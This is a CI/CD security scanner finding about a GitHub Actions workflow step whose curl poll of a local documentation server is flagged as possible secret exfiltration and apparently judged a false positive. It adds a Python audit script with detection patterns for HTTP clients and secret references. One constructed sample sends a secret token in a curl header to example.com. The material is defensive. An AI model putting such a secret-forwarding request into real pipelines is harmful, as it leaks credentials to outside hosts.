Runner-Guard Security Finding
Rule: RGS-012 - Secret Exfiltration via Outbound HTTP Request
Severity: High
File: .github/workflows/daily-multi-device-docs-tester.lock.yml
Line: 488
Description
Runner-Guard's source-to-sink taint analysis detected a `run:` block containing an outbound HTTP request (`curl`) in a job context that also has access to secrets or publishing capabilities. The flagged step polls a locally launched documentation dev server until it is ready:

```yaml
- name: Wait for server readiness
  run: |
    ...
    until curl -sf (localhost/redacted) > /dev/null 2>&1; do
    ...
    done
```

This particular request targets localhost:4321 and is almost certainly a false positive: it is a readiness check against the dev server started in the previous step. Runner-Guard flags it because the same job context can also read secrets, and the static analyzer cannot prove at analysis time that the URL is bound to localhost only. That is worth confirming by hand before dismissing the finding: the low-risk reading only holds while the URL is a literal in the workflow file, not assembled from an expression or an environment variable that a later edit could point at another host.
Impact
- The combination of outbound HTTP requests with secrets access in a workflow is the canonical secret-exfiltration shape; any rule-system tuned for supply-chain attacks must flag it.
- The actual risk here is low (localhost only, no secret values forwarded), but the noise reduces signal for future genuine RGS-012 findings.
Remediation
- Preferred: restructure so that no single job both polls the dev server and references secrets. Start the dev server, poll it, and run the tests that need it in a job that references no secrets, and put the secret-bearing steps in a downstream job gated with `needs:` on that readiness job. Note that a separate job runs on a separate runner, so the wait step cannot be split off on its own; the server it probes has to be started in the same job as the poll.
- Acceptable: suppress with a `# runner-guard:ignore RGS-012` annotation on the readiness step, documenting in a comment that the URL is bound to localhost only.
- Generic prevention: audit all `curl`/`wget`/`fetch` calls in workflows that touch secrets; ensure no secret values are placed in URLs, headers, or request bodies.
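The following is an added example, not Runner-Guard's own code, showing the audit that the preferred remediation and the generic-prevention item describe: walk each job of a workflow, and for every `run:` step that invokes an HTTP client in a job that also references `${{ secrets.* }}`, emit a finding. It adds one refinement the page says the scanner does not make, downgrading to Low only when every URL in the step is a literal loopback address; a URL containing an expression such as `${{ env.PORT }}` fails that test and stays High, which is the conservative behaviour described above. Workflows are given as the dict structure a YAML loader (for example `yaml.safe_load`) would return, so the script runs without PyYAML. All three sample workflows, the `publish.sh` script, the `API_TOKEN` secret name, and the `example.com` destination are constructed for this example and are not taken from the real lock file.

```python
import re

# Shell and JS HTTP clients the audit looks for inside run: blocks.
HTTP_CLIENT = re.compile(r"\b(?:curl|wget|fetch)\b")
# Any reference to the GitHub Actions secrets context.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
# A URL as written in a run: block; stops at whitespace or quotes.
URL = re.compile(r"https?://[^\s\"']+")
# Loopback destinations. A URL carrying an expression or shell variable
# (e.g. http://localhost:${{ env.PORT }}/) fails fullmatch and stays High.
LOOPBACK = re.compile(r"https?://(?:localhost|127\.0\.0\.1|\[::1\])(?::\d+)?(?:/[^\s\"']*)?")


def _scalars(node):
    """Yield every string scalar under a parsed workflow node."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from _scalars(value)
    elif isinstance(node, list):
        for value in node:
            yield from _scalars(value)


def job_uses_secrets(job):
    """True if anything in the job (env, with, run, ...) references secrets.*."""
    return any(SECRET_REF.search(s) for s in _scalars(job))


def audit_workflow(workflow):
    """One finding per run: step that issues an HTTP request inside a job
    that also references secrets (the RGS-012 source-to-sink shape)."""
    findings = []
    for job_name, job in workflow.get("jobs", {}).items():
        if not job_uses_secrets(job):
            continue  # no secret in scope, nothing to exfiltrate
        for index, step in enumerate(job.get("steps", [])):
            run = step.get("run", "")
            if not HTTP_CLIENT.search(run):
                continue
            urls = URL.findall(run)
            if SECRET_REF.search(run):
                severity, reason = "High", "secret referenced in the request step"
            elif urls and all(LOOPBACK.fullmatch(u) for u in urls):
                severity, reason = "Low", "literal loopback URL only"
            else:
                severity, reason = "High", "destination not provably local"
            findings.append({"job": job_name, "step": step.get("name", f"step {index}"),
                             "severity": severity, "reason": reason})
    return findings


# Constructed sample (not the real lock file): the shape Runner-Guard flagged,
# a loopback readiness poll in a job whose env also pulls in a secret.
FLAGGED = {"jobs": {"docs-tests": {
    "env": {"API_TOKEN": "${{ secrets.API_TOKEN }}"},
    "steps": [
        {"name": "Start dev server", "run": "npm run dev &"},
        {"name": "Wait for server readiness",
         "run": "until curl -sf http://localhost:4321/ > /dev/null 2>&1; do sleep 2; done"},
        {"name": "Run device tests", "run": "npm test"},
    ]}}}

# Constructed restructuring: server, readiness poll and tests live in a job
# with no secrets; the secret-bearing job is gated on it with needs:.
# A separate job is a separate runner, so the server starts in the same
# job as the poll, not in the publish job.
RESTRUCTURED = {"jobs": {
    "docs-readiness": {"steps": FLAGGED["jobs"]["docs-tests"]["steps"]},
    "publish": {
        "needs": "docs-readiness",
        "env": {"API_TOKEN": "${{ secrets.API_TOKEN }}"},
        "steps": [{"name": "Publish report", "run": "./publish.sh"}],  # hypothetical script
    }}}

# Constructed genuine RGS-012 shape: the secret rides in a request header to
# a non-local host, which is what the generic audit must catch.
EXFIL_SHAPE = {"jobs": {"report": {"steps": [{
    "name": "Upload results",
    "run": 'curl -H "Authorization: Bearer ${{ secrets.API_TOKEN }}" https://example.com/upload',
}]}}}

if __name__ == "__main__":
    for label, wf in [("flagged", FLAGGED), ("restructured", RESTRUCTURED), ("exfil", EXFIL_SHAPE)]:
        print(label, audit_workflow(wf))
```

Running it reports the readiness poll in `FLAGGED` as Low, nothing at all for `RESTRUCTURED` (the readiness job has no secret in scope, and the publish job makes no request), and the header-borne secret in `EXFIL_SHAPE` as High. The job-level `secrets` check is deliberately coarse, matching the rule's own reasoning: it is the combination of a secret in scope and an outbound request that is flagged, not a proof that the secret flows into the request.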
This is a new occurrence not covered by the previously closed RGS-012 issue (#30534), which only listed daily-model-inventory, docs-noob-tester, unbloat-docs, and visual-regression-checker.
Detected by runner-guard v2.6.0, CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/26144455365